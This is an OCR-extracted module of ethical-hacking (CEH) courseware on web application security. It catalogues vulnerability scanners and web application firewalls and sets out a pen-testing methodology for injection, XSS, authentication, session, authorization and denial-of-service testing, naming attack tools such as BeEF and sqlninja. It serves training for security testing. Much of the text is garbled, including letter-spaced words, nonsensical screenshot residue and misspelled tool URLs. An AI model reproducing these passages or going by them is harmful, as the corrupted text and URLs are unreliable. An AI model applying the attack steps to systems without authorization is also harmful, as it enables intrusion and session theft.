V u ln e r a b ility S c a n n e r
A cunetix W eb V ulnerability Scanner autom atically checks your web applications for S QL
i n j e c t i o n , XSS, a n d o t h e r w e b v u l n e r a b i l i t i e s . It i n c l u d e s a d v a n c e d p e n e tra tio n testin g tools,
such as th e HTTP E d it o r a n d t h e H T T P F u z z e r . It p o r t s c a n s a w e b s e r v e r a n d runs security
c h e c k s a g a i n s t n e t w o r k s e r v i c e s . It e v e n t e s t s w e b f o r m s a n d p a s s w o r d - p r o t e c t e d a r e a s . T h e
a u to m a ti c client script an aly z er allow s for secu rity te s tin g of A jax a n d W e b 2.0 a p p lic a tio n s.
₪ Pas Lockfor*■׳ac!i«<»nar1pc4cytiks
J Header - ChecktM cathe-caMml HTTP header met to the regorg' vAx
that aCortart -Typeneattr Uhciuded h ths HTTPresponseand^e>t8whent 3* « 0 * ₪ <*וי
• ׳Header Cheeksthat IE?* XSSproteetenBier Koar»tf been ebabledbythe Webappteabon
OncMiHattheXCONTENT-TYPEOPTONSiJefcnje aflarvt MlME«fRnflha»b»»n dedjred ₪
J Header Cheeksth®!he XfRAMEOPTlONS■headern berg set for defer®• aqaral CkkJaefcro'attacks
B Heady Lccfcter «■«■ahAfrytlcalicr prctooolr
0 rtor*״ten 0<ac*«*re Owck for conwon 9׳mt mMoagw wtLinsdby database* *Hcfi may rd a e 9311! *toow• SDLO*
ז7 ןrfy -Bcn Dadeare Oteekfor dubom eoiment• that vnairartfuther attention M/A
7 rtomaton D*3c»je LooHlotevMlNe rtamatieripajesdttrojtfi HTTPwjjwt ul«twl*w*»a OWASPASV12
look for semttve rfenrater paiied Ihrou^i URL [Mrarreteis OWASf ASVU
fTiJa<*«utrt-bu׳wr«^׳r*1crt«coJ*foruwc<d#>3r0usr׳ji1)fTK<J«xh w».'.wBSX
TSrt ־>■*׳־k mil srnnrh MTMl convnt, ineludmo comment! k common error mrsinor *־returned by ptmtewns sue♦! as ( 6w»׳t ) Export NeAod• HTNLRwott
Af.PNTT and Web savers such 09 IIS ond Apoebe Y<hh 1ftonfioure Ibe l!v of common debug mer-wiges » look ter
it* nge •** *יttbamg URU
'S o J ft*.'* r-otfcuBtad.tan/m•febw/Ch««fc. Pmv.ltwCanbeUd.Jr/aiu vl£v«<t.1;>v?ul mrTMtVdw*
r r t t h o S c » r c lavaanix ivonti Ahrti may bo afrart»׳vmtrelUft*a׳
1J l»*i n w «•« Anrd m #»• ♦ 0 נז40** יdata of an crto.nl' events
C 3 S 3 B 3 watdier Web Security Tool vt.3.0, Copyright C• 2010 C3;3ba ..C- AJI djitts reserved- casasa Aatc «־V/cDSecurity Tool vlJ.O, CooyriQht©20:0 Casaoa Security. LLC. All risnu reserved.
http://www.casaba.com
Copyright © by EC-Gauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
J L T o o l
W a t c h e r is a p l u g i n f o r t h e F i d d l e r H T T P p r o x y t h a t p a s s i v e l y a u d i t s a w e b a p p l i c a t i o n t o f i n d
security bugs and com pliance issues autom atically. Passive detection means it's safe for
p r o d u c t i o n u s e . It d e t e c t s w e b - a p p l i c a t i o n s e c u r i t y i s s u e s a n d o p e r a t i o n a l c o n f i g u r a t i o n i s s u e s .
s fa 11
יCMnWSw
C ro s s -s ite S c rip tin g
c
URL l a x / / 1c5tJ7.ne2Mrt«r.cQm:8l8! 1 fflefwra/MSiDyreftected32 ׳
P* * — ד• ׳H •* 010 ! י * »־$ j ׳. Krtpt:
PARAMETER
ptram
MAME
PARAMETER
TVPC (Jjfryitnnj
ATTACK
PATTtftM «»a|p1»4k»t(0»0000l&)< ח
ג C L A S S IF IC A T IO N
V U L N E R A B IL I T Y D E T A IL S
XSS (O w rM t SoHAmu) d v «1 mn tv «*«-.**« • ki :.0 t u
dr«»*on1 kjhA (!••**C'pC V W c 1 <«(>* ׳U o*
a0pbcat»n T**s 1 lo«c y t i * o*p4rtun*14« K l ו.נ L iii
moith t♦ •־cvr<nt ■Mixyi * x m«r t* tfunfm] Vm
kvoV (4 rtw* 0 M)* b» * ♦יwtvi anrt»*yro<t»*m» OWAV a:
♦ ■ ^ ר־ז־י־י
*
9
Croupbuctb)’
Ml Vjlnt<jb1KvT>o«
ScarandConfarratcnfirntsd J fV
ory:SystemlMoneJ
W e b A p p lic a t io n S e c u r it y T o o l: N ־S ta lk e r
W e b A p p lic a t io n S e c u r it y S c a n n e r
EH
Ifryfr > 1 » > 1 N־S:alker Web Application Security Scanner2012 - Free Edition
J N-Stalker Web Application N—' MM -Suia
-S krerSS
ke en
en w׳
tner Scan Cffcr«i
I r. -»:«n AtMMffl 0
1 i>
Sw Mjojo , .. a ׳T»>«־rh
5'.«U.» 1• S'.atei Sca' -W h brae a
http://nstalker.com
W e b A p p lic a t io n S e c u r it y T o o l:
V a m p ir e S c a n
EH
F eatu res
e P ro te c t y o u r w e b s ite fro m
hackers
e Scan and p r o te c t y o u r
in fra s tru c tu re a n d w e b
a p p lic a tio n s f r o m c y b e r-
th re a ts
© G ive y o u d ire c t,
a c tio n a b le in s ig h t o n
high, m e d iu m , a n d lo w
risk v u ln e ra b ilitie s
http://www.vampiretech.com
IH L T S a n d c a tM in i W e b s e c u rify
h ttp ://w w w .s y h u n t.c o m h t t p : / / w w w . w e b s e c u r ify . c o m
O W A S P ZAP N e tB r u te
h t tp : //w w w . ow a sp. o rg h t t p : / / w w w . r a w lo g ic . c o m
W SS A - W e b S ite S e c u r ity
S e c u B a t V u ln e r a b ility S c a n n e r
h t t p : / / s e c u b a t . c o d e p ie x . c o m
f t . S c a n n in g S e rvice
' h t t p s : / / s e c u r e . b e y o n d s e c u r it y . c o m
SPIKE P ro x y R a tp ro x y
h t t p : / / w w w . im m u n it y s e c . c o m h t t p : / / c o d e , g o o g le , c o m
W eb application security tools are web application security assessm ent softw are
designed to thoroughly analyze tod ay's com plex web applications w ith the aim of finding
e x p l o i t a b l e S Q L i n j e c t i o n , XSS v u l n e r a b i l i t i e s , e t c . T h e s e t o o l s d e l i v e r s c a n n i n g c a p a b i l i t i e s ,
b ro a d a s s e s s m e n t c o v e ra g e , a n d a c c u r a te w e b app licatio n sc a n n in g results. C o m m o n ly u se d
w e b a p p lic a tio n se c u r ity to o ls a r e listed as follow s:
0 O W A S P ZAP a v a i l a b l e a t h t t p : / / w w w . o w a s p . o r g
6 skipfish a v a ilab le a t h t t p : / / c o d e . g o o g l e . c o m
© SPIKE P r o x y a v a i l a b l e a t h t t p : / / w w w . i m m u n i t v s e c . c o m
Q X5s a v a ila b le a t h t t p : / / w w w . c a s a b a . c o m
https://secure.bevondsecuritv.com
W a p iti i p i S y h u n t H y b rid
h t t p : / / w a p i t i , s o u r c e fo r g e , n e t h ttp ://w w w .s y h u n t.com
W e b W a tc h B o t E x p lo it- M e
h t t p : / / w w w . e x c la m a tio n s o f t . c o m
1
M h t t p : / '/ l a b s , s e c u r it y c o m p a s s .c o m
Kf -r ! \ KeepN I
h t t p : / / w w w . k e e p n i. c o m
(P " W S D ig g e r
h t t p : / / w w w . m c a fe e . c o m
G ra b b e r A ra c h n i
h t t p : / / r g a u c h e r . in fo □ □ ם h t t p : / / a r a c h n i- s c a n n e r . c o m
xsss Vega
h t tp : //w w w .s ven. de - ח ד h t t p : / / w w w .s u b g ra p h . c o m
In a d d i t i o n t o t h e p r e v i o u s l y m e n t i o n e d w e b a p p l i c a t i o n s e c u r i t y t o o l s , t h e r e a r e f e w
m o r e tools th a t can be u sed to assess th e security of w e b applications:
© XSSS a v a i l a b l e a t h t t p : / / w w w . s v e n . d e
© S v h u n t Hybrid av a ila b le a t h t t p : / / w w w . s v h u n t . c o m
© W SD igger available at h tt p :/ /w w w .m c a f e e .c o m
© V ega available at h tt p :/ /w w w .s u b g r a p h .c o m
d o tD e fe n d e r is a s o ftw a r e
AM
e * י׳מייvew *ovomrs .» »«*׳hc*<
based W e b A p p lic a tio n cbtOefrndEr(329 daysfcft)
F ire w a ll
il U EventView?(Locrf)
_tlו׳ויInternetIrrfonriaaarSer*
d tDefender
4> Gbbal Settngs
I t c o m p le m e n ts th e □ {2) De^aiJt Scanty FtoSe p-otec
n e t w o r k f ir e w a ll, IPS and
Server Ma*ng
[£ Lpka: Fok:»5־
i 9 SQL
־Infection
0 £ כPatterns awM* ypev. sol r t- « «
o th e r n e tw o rk -b a s e d ffl fel WhalBt (Perm!*d As
ij £2) Pararoc
In te r n e t s e c u rity p ro d u c ts ij fgtEncotlnQ w Suspect Single Quote (Safe)
[fl BjffwOi'eHbn □
a £21SQLlr!j*ct>cr
I t in s p e c ts th e HTTP/HTTPS Lae ׳cHhed
מPattern = Pattern □
t r a f fic f o r su sp icio u s CB .71 ־CT0B-5WSowanc
b e h a v io r CU c7t *,י^ג
Classic SQL Comment ’־־ D
ש c7(•י־*יי5
I t d e te c ts a n d b lo c k s SQL Ltl uJ)
R«no(e ca< ״m#nfl l*e
Q) Ced* mrrten( )!
w SQL Comments Q
U
flj*e]<:*•<<ז W ‘Select Version' Statement Q
. ןAfttna FTP *זיל:Jw LVaUi:
P SQL CHAR Type ם
http://www. opplicure.com
dotD efender™ is a s o f t w a r e - b a s e d w e b a p p l i c a t i o n f i r e w a l l t h a t p r o v i d e s a d d i t i o n a l w e b s i t e
security against malicious attacks and w ebsite defacem ent. It p r o t e c t s your w ebsite from
m alicious attacks. W eb application attacks such as SQL in je c tio n , path traversal, cross-site
scripting, a n d o t h e r a tta c k s leading to w e b s ite d e f a c e m e n t can b e p r e v e n t e d w ith d o tD e f e n d e r .
It c o m p l e m e n t s t h e n e t w o r k f i r e w a l l , IPS, a n d o t h e r n e t w o r k - b a s e d I n t e r n e t s e c u r i t y p r o d u c t s .
It i n s p e c t s H T T P / H T T P S t r a f f i c f o r s u s p i c i o u s b e h a v i o r .
S erve rD efen der VP W eb a p p lic a tio n fire w a ll is d e sig ned to p ro v id e s e c u rity a g ainst w e b a tta cks
p o r t8 0
SQL Injection
&Z|aoACfttJ«9teStTplng(>SS) M l_______ v_
ribicdKTW
Gcnenc ]׳ru t wrrtiratwn
OiNone
$l**Mun 0 ^נ. II. 12, H 31, 127, 175-223, 25$)
C) Extended (>, <,', ♦ וMnmum
1
OPwanad (L *. M . ,] *M a d id
http://www.port80software.com
T h e S e r v e r D e f e n d e r V P w e b a p p l i c a t i o n f i r e w a l l is d e s i g n e d t o p r o v i d e s e c u r i t y a g a i n s t w e b
attacks. SDVP security wi l l prevent data theft and breaches and stop unauthorized site
d e f a c e m e n t , file a l t e r a t i o n s , a n d d e l e t i o n s .
W
Q u a ly s G u a rd W AF IB M S e c u r ity A p p S c a n
h t t p : / / w w w . q u a ty s . c o m h t t p : / / w w w -0 1 . ib m . c o m
T h re a tR a d a r T r u s tw a v e W e b D e fe n d
h t t p : / / w w w . im p e r v a . c o m h t t p s : / / w w w . tr u s t w a v e , c o m
© T h re a tR a d a r available a t h tt p :/ /w w w .im p e r v a .c o m
© IBM S e c u r i t y A p p S c a n a v a i l a b l e a t h t t p : / / w w w - 0 1 . i b m . c o m
M o d u l e F lo w C E H
W eb A pp C oncepts
fa
* Q Q Q
S e c u rity Tools W eb A pp Threats
^־־ M o d u le F lo w
As m e n t i o n e d p r e v i o u s l y , w e b a p p l i c a t i o n s a r e m o r e v u l n e r a b l e t o a t t a c k s . A t t a c k e r s
use w eb applications as th e sources for spreading attacks by tu rn in g t h e m into m alicious
applications once com prom ised. Your w e b application may also become a victim of such
a t t a c k s . T h e r e f o r e , t o a v o i d t h i s s i t u a t i o n , y o u s h o u l d c o n d u c t p e n e t r a t i o n t e s t i n g in o r d e r t o
d e t e r m i n e t h e vulnerabilities b e fo r e th e y a re ex p lo ited by real a ttack ers.
J W eb a p p lica tio n pen te s tin g is used to id e n tify , a na lyze , and r e p o r t v u ln e r a b ilitie s such as in p u t va lid a tio n ,
b u ffe r o v e rflo w , SQL in je c tio n , b ypassing a u th e n tic a tio n , code execution, etc. in a g iven a p p lica tio n
□j
p -----------
1 http.׳/
sm m
!
R e m e d ia tio n o f V u ln e ra b ilitie s
Id e n tific a tio n o f P orts
W e b a p p l i c a t i o n p e n t e s t i n g h e l p s in:
0 V e r i f i c a t i o n o f V u l n e r a b i l i t i e s : T o e x p l o i t t h e v u l n e r a b i l i t y in o r d e r t o t e s t a n d f i x t h e
issue.
_ _
W e b A p p lic a t io n P e n T e s t in g
C E H
( C o n t ’d )
START
------------------- * ---------------------
v
------------------- * ---------------------
9 --------------------- ■--------------------- V
------------------- * ---------------------
V
S t e p 1: D e f i n i n g o b j e c t i v e
Y o u s h o u l d d e f i n e t h e a i m o f t h e p e n e t r a t i o n t e s t b e f o r e c o n d u c t i n g it. T h i s w o u l d h e l p y o u t o
m o v e in r i g h t d i r e c t i o n t o w a r d s y o u r a i m o f p e n e t r a t i o n t e s t .
S t e p 2: I n f o r m a t i o n g a t h e r i n g
S t e p 3: C o n f i g u r a t i o n m a n a g e m e n t t e s t i n g
S te p 4: A u t h e n t i c a t i o n t e s ti n g s e s s io n
I n f o r m a t io n G a t h e r in g C E H
I n f o r m a tio n G a th e r in g
S t e p 1: A n a l y z e t h e r o b o t s . t x t f i l e
R o b o t . t x t is a f i l e t h a t i n s t r u c t s w e b r o b o t s a b o u t t h e w e b s i t e s u c h a s d i r e c t o r i e s t h a t c a n b e
allow ed a n d disallow ed to th e user. H ence, analyze th e ro b o t.tx t an d d e te r m in e th e allow ed
a n d d i s a l l o w e d d i r e c t o r i e s o f a w e b a p p l i c a t i o n . Y ou c a n r e t r i e v e a n d a n a l y z e r o b o t s . t x t file
using tools such as GNU W get.
S t e p 2: P e r f o r m s e a r c h e n g i n e r e c o n n a i s s a n c e
Use th e advanced "site:" s e a r c h operator and then click C a c h e d t o perform search engine
r e c o n n a i s s a n c e . It g i v e s y o u i n f o r m a t i o n s u c h a s i s s u e s o f w e b a p p l i c a t i o n s t r u c t u r e a n d e r r o r
pages produced.
I n f o r m a t io n G a t h e r in g r g u
( C o n t ’d ) (•lllfwtf | ltkl«4l NMhM
>/
I n f o r m a tio n G a th e r in g ( C o n t ’d )
S t e p 6: A n a l y z e e r r o r c o d e s
Analyze error codes by requesting invalid pages and utilize alternate request m ethods
( P O S T / P U T / O t h e r ) in o r d e r t o c o l l e c t c o n f i d e n t i a l i n f o r m a t i o n f r o m t h e s e r v e r . T h i s m a y r e v e a l
inform ation such as softw are versions, details of databases, bugs, and technological
com ponents.
S t e p 7: T e s t f o r r e c o g n i z e d file t y p e s / e x t e n s i o n s / d i r e c t o r i e s
T e s t f o r r e c o g n i z e d file t y p e s / e x t e n s i o n s / d i r e c t o r i e s b y r e q u e s t i n g c o m m o n file e x t e n s i o n s s u c h
a s . AS P, . H T M , . P H P , .EXE, a n d o b s e r v e t h e r e s p o n s e . T h i s m a y g i v e y o u a n i d e a a b o u t t h e w e b
application en v iro n m en t.
S t e p 8: E x a m i n e s o u r c e o f a v a i l a b l e p a g e s
S t e p 9: T C P /I C M P a n d s e r v ic e f i n g e r p r i n t i n g
Perform TCP/ICM P a n d service fingerprinting using tra d itio n a l fin g erp rin tin g to o ls such as
N m ap and Queso, or the m o r e r e c e n t a p p lic a tio n fin g e rp rin tin g to o ls A m a p . This gives y o u
in fo rm atio n a b o u t w e b application services a n d asso ciate d ports.
r C o n fig u ratio n M a n a g e m e n t
Testing
&
c EH
tertMM
Source code, in s ta lla tio n V e rify th e presence o f old , Test fo r in fra s tru c tu re A d m in interfaces can be
paths, passw ords fo r backup, and u n re fe re n c e d and a p p lic a tio n adm in fo u n d t o gain access to
app lica tio n s, and databases file s in te rfa c e s adm in fu n c tio n a lity
C o n f ig u r a tio n M a n a g e m e n t T e s tin g
f ^ \
Once you gather inform ation about the web application environm ent, test the
configuration m anagem ent. It is i m p o r t a n t t o test th e configuration m anagem ent because
im p r o p e r c o n fig u ratio n m a y allow u n a u t h o r i z e d u s e r s to b re a k into t h e w e b application.
S t e p l : P e r f o r m SSL/TLS t e s t i n g
S S L / TL S t e s t i n g a l l o w s y o u t o i d e n t i f y t h e p o r t s a s s o c i a t e d w i t h S S L / T L S w r a p p e d s e r v i c e s . Y o u
c a n d o th is w ith t h e h e lp o f to o ls s u c h a s N m a p a n d N e ssu s. This h e lp s d is clo se c o n fid e n tia l
inform ation.
S t e p 2: P e r f o r m i n f r a s t r u c t u r e c o n f i g u r a t i o n m a n a g e m e n t t e s t i n g
S t e p 3: P e r f o r m a p p l i c a t i o n c o n f i g u r a t i o n m a n a g e m e n t t e s t i n g
A u t h e n t ic a t io n T e s t in g C E H
® A tt e m p t t o fo r c e a ra ce c o n d itio n , m ake
Test f o r race m u ltip le sim u lta n e o u s re q ue sts w h ile
Race c o n d itio n s
c o n d itio n s o b se rvin g th e o u tco m e f o r u ne xp e cte d
b e h a vio r. P erfo rm co de re vie w .
S t e p 1: T e s t f o r V u l n e r a b l e R e m e m b e r p a s s w o r d a n d p w d r e s e t
T e st fo r V u ln e ra b le R e m e m b e r p a s s w o r d a n d p w d r e s e t by a t t e m p t i n g t o r e s e t p a s s w o r d s by
g u e s s i n g , s o c i a l e n g i n e e r i n g , o r c r a c k i n g s e c r e t q u e s t i o n s , if u s e d . C h e c k if a " r e m e m b e r m y
p a s s w o r d " m e c h a n i s m is i m p l e m e n t e d b y c h e c k i n g t h e H T M L c o d e o f t h e l o g i n p a g e ; t h r o u g h
this p a s s w o rd , a u th e n tic a tio n w e a k n e s s can b e u n c o v e re d .
S t e p 2: T e s t f o r l o g o u t a n d b r o w s e r c a c h e m a n a g e m e n t
S t e p 3: T e s t f o r C APTC HA
I d e n t i f y all p a r a m e t e r s t h a t a r e s e n t in a d d i t i o n t o t h e d e c o d e d C A P T C H A v a l u e f r o m t h e c l i e n t
t o t h e s e r v e r a n d t r y t o s e n d a n o l d d e c o d e d C A P T C H A v a l u e w i t h a n o l d C A P T C H A ID o f a n o l d
s e s s i o n ID. T h i s h e l p s y o u t o d e t e r m i n e a u t h e n t i c a t i o n v u l n e r a b i l i t i e s .
Session M a n a g e m e n t T e s tin g C E H
pySj S e s s io n M a n a g e m e n t T e s tin g
S t e p 1: T e s t f o r s e s s i o n m a n a g e m e n t s c h e m a
S t e p 2: T e s t f o r c o o k i e a t t r i b u t e s
S t e p 3: T e s t f o r s e s s i o n f i x a t i o n
A u t h o r iz a t io n T e s t in g C EH
teftMM ItkMJl Nm Im
START
y Can ga in access to
re s e rv e d in fo r m a tio n
© Test fo r path traversal by p erform ing in p u t v e c to r e n u m e ra tio n and analyzing th e in p u t va lid a tio n fu n c tio n s present in
th e w eb application
e Test fo r bypassing a uth oriza tion schema by exam ining the adm in fu n c tio n a litie s , to gain access to th e resources
assigned to a d iffe re n t role
A u th o r iz a tio n T e s tin g
Follow the steps here to test the web application against authorization
vulnerabilities:
S t e p 1: T e s t f o r p a t h t r a v e r s a l
Test for path traversal by perform ing input vector enum eration and analyzing the input
validation fu n ctio n s present in t h e web application. P ath trav ersal allow s a tta c k e rs to gain
access to reserved inform ation.
S t e p 2: T e s t f o r b y p a s s i n g a u t h o r i z a t i o n s c h e m a
S t e p 3: T e s t f o r p r i v i l e g e e s c a l a t i o n
T e s t f o r r o l e / p r i v i l e g e m a n i p u l a t i o n . If t h e a t t a c k e r h a s a c c e s s t o r e s o u r c e s / f u n c t i o n a l i t y , t h e n
h e or s h e can p e rfo rm a privilege e sc a la tio n a tta c k .
D a t a V a lid a t io n T e s t in g C E H
U rtifM itfciui Nm Im
START
Detect and analyze input vectors for potential vulnerabilities, analyze the
Session cookie vulnerability report and attempt to exploit it. Use tools such asOWASP CAL9000,
WebScarab, XSS-Proxy, ratproxy, and Burp Proxy
in fo rm a tio n
Analyze HTMLcode, test for Stored XSS, leverageStoredXSS,verifyifthefile
upload allows setting arbitrary MIMEtypes using tools such asOWASP CAL9000,
Hackvertor, BeEF, XSS-Proxy, Backframe, WebScarab, Burp,and XSS Assistant
9 Perform source code analysis to identify JavaScript coding errors
Sensitive in fo rm a tio n
Test fo r s to re d 9 Analyze SWF files using tools such as SWFIntruder, Decompiler ־Flare, Compiler
such as session
c ro s s -s ite s c rip tin g ־MTASC, Disassembler -Flasm,Swfmil I, and Debugger Version of Flash
a uth oriza tion tokens Plugi n/Player
9 Perform Standard SQL Injection Testing, Union Query SQL Injection Testing,
Blind SQL Injection Testing, and Stored Procedure Injection using tools suchas
OWASP SQLiX, sqlninja, SqlDumper, sqlbftools, SQLPower Injector, etc.
Test fo r D O M -b a s e d « Use a trial and error approach by inserting'(',' I', and the other
Cookie in fo rm a tio n
c ro s s -s ite s c rip tin g characters in order to check the appl icati on for errors. Use the tool Softerra
LDAP Browser
In fo rm a tio n on DOM-
Test fo r cross s ite Sensitive in fo rm a tio n
based cross-site < .......
fla s h in g a bo u t users and hosts
scripting vulnerabilities
S t e p 1: T e s t f o r r e f l e c t e d c r o s s - s i t e s c r i p t i n g
A r e f l e c t e d c r o s s - s i t e s c r i p t i n g a t t a c k e r c r a f t s a URL t o e x p l o i t t h e r e f l e c t e d XSS v u l n e r a b i l i t y
a n d s e n d s it t o t h e c l i e n t in a s p a m m a i l . If t h e v i c t i m c l i c k s o n t h e l i n k c o n s i d e r i n g it a s f r o m a
t r u s t e d s e r v e r , t h e m a l i c i o u s s c r i p t e m b e d d e d b y t h e a t t a c k e r in t h e URL g e t s e x e c u t e d o n t h e
victim 's b r o w s e r a n d sends the victim 's s e s s io n cookie to the attacker. Using this sessio n
co o k ie , t h e a t t a c k e r c a n ste a l t h e s e n s itiv e in f o r m a tio n o f t h e victim . H e n c e , t o av o id th is kind
o f a t t a c k y o u m u s t c h e c k y o u r w e b a p p l i c a t i o n s a g a i n s t r e f l e c t e d XSS a t t a c k s . If y o u p u t p r o p e r
d a t a v a l i d a t i o n m e c h a n i s m s o r m e t h o d s in p l a c e , t h e n y o u c a n d e t e r m i n e e a s i l y w h e t h e r t h e
URL c a m e o r i g i n a l l y f r o m t h e s e r v e r o r it is c r a f t e d b y t h e a t t a c k e r . D e t e c t a n d a n a l y z e i n p u t
v e c t o r s f o r p o t e n t i a l v u l n e r a b i l i t i e s , a n a l y z e t h e v u l n e r a b i l i t y r e p o r t , a n d a t t e m p t t o e x p l o i t it.
U s e t o o l s s u c h a s O W A S P C A L 9 0 0 0 , H a c k v e r t o r , B e E F , X S S - P r o x y , B a c k f r a m e , W e b S c a r a b , XSS
A ssistant, a n d B urp Proxy.
© D is c o v e r v u ln e r a b ilitie s o f an O R M
t o o l a nd te s t w e b a p p lic a tio n s t h a t use
O R M . U se to o ls such as H ib e rn a te ,
I n fo r m a tio n o n SQL
N h ib e rn a te , and R uby O n Rails
in je c tio n v u ln e ra b ility
© Try t o in s e rt X M L m e ta c h a ra c te rs
© Find if th e w e b s e rv e r a c tu a lly
I n fo r m a tio n a b o u t
s u p p o rts SSI d ire c tiv e s using to o ls
X M L s tru c tu re
such as W e b P roxy B u rp S uite, OWASP
ZAP, W ebS cara b, S trin g s e a rc h e r: grep
W e b s e rv e r CGI © In je c t X P a th c o d e a n d in te r fe re w ith
e n v iro n m e n t v a ria b le s th e q u e ry re s u lt
© I d e n t if y v u ln e r a b le p a ra m e te rs .
U n d e rs ta n d th e d a ta f lo w a nd
Access c o n fid e n tia l d e p lo y m e n t s tru c tu re o f th e c lie n t,
in fo r m a tio n a n d p e r fo rm IM A P /S M T P c o m m a n d
in je c tio n
S t e p 7: P e r f o r m O R M i n j e c t i o n t e s t i n g
Perform ORM injection testing to discover vulnerabilities of an ORM tool and test web
a p p l i c a t i o n s t h a t u s e O R M . U s e t o o l s s u c h a s H i b e r n a t e , N h i b e r n a t e , a n d R u b y O n Rails. T h i s
t e s t g iv e s i n f o r m a t i o n o n SQL i n j e c t i o n v u l n e r a b i l i t i e s .
S t e p 8: P e r f o r m X M L i n j e c t i o n t e s t i n g
T o p e r f o r m XML i n j e c t i o n t e s t i n g , t r y t o i n s e r t XML m e t a c h a r a c t e r s a n d o b s e r v e t h e r e s p o n s e .
A s u c c e s s f u l XML i n j e c t i o n m a y giv e i n f o r m a t i o n a b o u t X M L s t r u c t u r e .
S t e p 9 : P e r f o r m SSI i n j e c t i o n t e s t i n g
P e r f o r m SSI i n j e c t i o n t e s t i n g a n d f i n d if t h e w e b s e r v e r a c t u a l l y s u p p o r t s SSI d i r e c t i v e s u s i n g
t o o l s s u c h a s W e b P r o x y B u r p S u i t e , P a r o s , W e b S c a r a b , S t r i n g s e a r c h e r : g r e p . If t h e a t t a c k e r c a n
i n j e c t SSI i m p l e m e n t a t i o n s , then he or she can set or print w e b s e r v e r CGI e n v i r o n m e n t
variables.
S te p 10: P e r f o r m X P a th in je c tio n t e s t i n g
S te p 13: P e r f o r m OS c o m m a n d i n g
Perform manual code analysis and craft malicious HTTP requests using | to test for OS
c o m m a n d in j e c t i o n a t t a c k s . OS c o m m a n d i n g m a y r e v e a l local d a t a a n d s y s t e m i n f o r m a t i o n .
S te p 14: P e r f o r m b u f f e r o v e r f l o w te s t i n g
S te p 15: P e r f o r m i n c u b a t e d v u ln e r a b ility t e s t i n g
U pload a file t h a t exploits a com ponent in t h e local user w orkstation, when view ed or
d o w n l o a d e d b y t h e u s e r , p e r f o r m XSS, a n d S Q L i n j e c t i o n a t t a c k s . I n c u b a t e d v u l n e r a b i l i t i e s m a y
give in f o r m a tio n a b o u t s e r v e r c o n fig u ra tio n a n d in p u t v a lid a tio n s c h e m e s to t h e a tta c k e rs .
S t e p l : T e s t f o r SQL w i l d c a r d a t t a c k s
Find w h e r e t h e n u m b e r s s u b m i t t e d a s a n a m e / v a l u e p a ir m i g h t b e u s e d b y t h e a p p l i c a t i o n c o d e
a n d a t t e m p t t o s e t t h e v a l u e t o a n e x t r e m e l y l a r g e n u m e r i c v a l u e , a n d t h e n s e e if t h e s e r v e r
D e n ia l־o f־S e r v ic e T e s t in g
CEH
( C o n t ’d )
T e s t f o r u s e r i n p u t a s a l o o p c o u n t e r a n d e n t e r a n e x t r e m e l y l a r g e n u m b e r in t h e i n p u t f i e l d t h a t
is u s e d b y a p p l i c a t i o n a s a l o o p c o u n t e r . If t h e a p p l i c a t i o n f a i l s t o e x h i b i t i t s p r e d e f i n e d m a n n e r ,
it m e a n s t h a t a p p l i c a t i o n c o n t a i n s a l o g i c a l e r r o r .
U s e a s c r i p t t o a u t o m a t i c a l l y s u b m i t a n e x t r e m e l y l o n g v a l u e t o t h e s e r v e r in t h e r e q u e s t t h a t is
b ein g logged.
Identify a n d s e n d a large n u m b e r o f r e q u e s t s t h a t p e r f o r m d a t a b a s e o p e r a t i o n s a n d o b s e r v e
any slow dow n or new error m essages.
S t e p 8 : T e s t f o r s t o r i n g t o o m u c h d a t a in s e s s i o n
w To gather WS information use tools such as wsCh ess, Soaplite, CURL, Peri, etc.
and online tools such as UDDI Browser, WSIndex, and Xmethods
» Use tools such as WSDigger, WebScarab, and Found stone to automate web
services security testing
« Pass malformed SOAP messages to XML parser or attach a very large string to
the message. Use WSdigger to perform autom ated XML structure testing
» Craft an XML docum ent (SOAP message) to send to a web service tha t contains
malware as an attachm ent to check if XML document has SOAP attachm ent
vulnerability
In fo r m a t io n a b o u t SQL,
X P a th , b u f f e r o v e r flo w , I n f o r m a t io n a b o u t
a n d c o m m a n d in je c tio n M I T M v u ln e r a b ilit y
v u ln e r a b ilitie s
H T T P G E T /R E S T SOAP m e ssa ge
a t t a c k v e c to r s in f o r m a t io n
W e b S e r v i c e s T e s t i n g
A JAX a p p lic a t io n c a ll
e n d p o in t s
X M L H t tp R e q u e s t o b je c t ,
P a rs e t h e H T M L a n d
J a v a S c rip t f ile s , A JAX
J a v a S c r ip t f i l e s
fra m e w o r k s
U se a p ro x y to ................. v F o r m a t o f a p p lic a t io n
o b s e rv e t r a ff ic re q u e s ts
8 E n u m e r a t e t h e A J A X c a ll e n d p o in t s f o r t h e a s y n c h r o n o u s c a lls u s in g t o o l s s u c h a s S p r a ja x
ט O b s e r v e H T M L a n d J a v a S c r ip t f i l e s t o f i n d U R L s o f a d d it io n a l a p p lic a t io n s u r f a c e e x p o s u r e
© U s e p r o x i e s a n d s n i f f e r s t o o b s e r v e t r a f f i c g e n e r a t e d b y u s e r - v ie w a b le p a g e s a n d t h e b a c k g r o u n d a s y n c h r o n o u s
t r a f f i c t o t h e A J A X e n d p o in t s in o r d e r t o d e t e r m in e t h e f o r m a t a n d d e s t in a t io n o f t h e r e q u e s t s
A J A X T e s t i n g
The following are the steps used to carry out AJAX pen testing:
Step 1: Test for AJAX
Enumerate the AJAX call endpoints for the asynchronous calls using tools such as Sprajax.
Step 2: Parse the HTML and JavaScript files
Observe HTML and JavaScript files to find URLs of additional application surface exposure.
Step 3: Use a proxy to observe traffic
Use proxies and sniffers to observe traffic generated by user-viewable pages and the
background asynchronous traffic to the AJAX endpoints in order to determine the format and
destination of the requests.
M odule Summary U
CEH
rtiffetf itkNjI lUilwt
W i t h in c re a s in g d e p e n d e n c e , w e b a p p lic a t io n s a n d w e b s e rv ic e s a re in c r e a s in g ly b e in g ta r g e te d
b y v a r io u s a tta c k s t h a t re s u lts in h u g e re v e n u e lo s s f o r t h e o r g a n iz a tio n s
It is a ls o o b s e rv e d t h a t m o s t o f t h e v u ln e r a b ilit ie s r e s u lt b e c a u s e o f m is c o n fig u r a t io n a n d n o t
f o llo w in g s ta n d a rd s e c u r ity p ra c tic e s
-----------
M o d u l e S u m m a r y